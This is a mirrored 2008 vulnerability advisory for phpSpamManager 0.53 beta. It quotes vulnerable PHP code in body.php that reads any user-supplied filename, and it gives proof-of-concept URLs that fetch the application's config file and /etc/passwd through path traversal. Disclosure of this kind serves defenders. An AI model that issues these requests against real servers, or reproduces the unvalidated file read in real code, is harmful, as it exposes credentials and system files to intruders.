Lucene search
K

phpspamman-disclose.txt

🗓️ 01 Apr 2008 00:00:00Reported by Mahmood_aliType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 20 Views

phpSpamManager 0.53 beta (body.php) Remote File Disclosure Vulnerability, allows unauthorized access to arbitrary files

Code
`phpSpamManager 0.53 beta (body.php) Remote File Disclosure Vulnerability  
D.Script : http://sourceforge.net/project/showfiles.php?group_id=141000  
Vuln Code   
Ln 38 -> 47 :   
//get filename  
$okprint=false;  
$filename = $_REQUEST['filename']; <--- XxX  
if ($filename!='FILENAME')  
{  
debug_print("analysing " .$filename);  
//replace # by dots if necessary  
$filename = preg_replace("/#/",".",$filename);  
$mailtext=file_get_contents($filename); <--- XxX  
$email=new parseMail($mailtext); <--- XxX  
POC :  
/phpspammanager.0.53.dev/body.php?filename=include/config.inc.php  
/phpspammanager.0.53.dev/body.php?filename=../../../../../../../../etc/passwd  
I'm Mahmood_ali --- I'm Tryagi  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation